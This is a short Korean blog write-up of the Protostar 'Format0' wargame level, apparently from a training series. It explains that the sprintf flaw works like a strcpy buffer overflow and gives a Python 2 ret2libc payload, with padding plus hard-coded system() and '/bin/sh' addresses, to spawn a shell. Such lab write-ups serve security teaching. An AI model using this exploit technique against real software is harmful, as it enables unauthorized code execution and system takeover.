sprintf 취약점을 이용한 BOF네요.

strcpy와 동일합니다.



값을 바꿔줍시다.



#coding: utf-8
from struct import pack, unpack

p = lambda x: pack("<L", x)
up = lambda x: pack("<L", x)[0]

system = 0xb7ecffb0
binsh = 0xb7fb63bf

payload = 'A'*80
payload += p(system)
payload += 'BBBB'
payload += p(binsh)

print payload

format0.py



쉘도 따줍시다.



저작자표시 비영리 동일조건

'Wargame > Protostar:Exploit-Exercises' 카테고리의 다른 글

[Protostar : Exploit-Exercises] Format2  (0) 2016.09.24
[Protostar : Exploit-Exercises] Format1  (0) 2016.09.24
[Protostar : Exploit-Exercises] Stack7  (0) 2016.09.24
[Protostar : Exploit-Exercises] Stack6  (0) 2016.09.24
[Protostar : Exploit-Exercises] Stack5  (0) 2016.09.24

+ Recent posts

티스토리툴바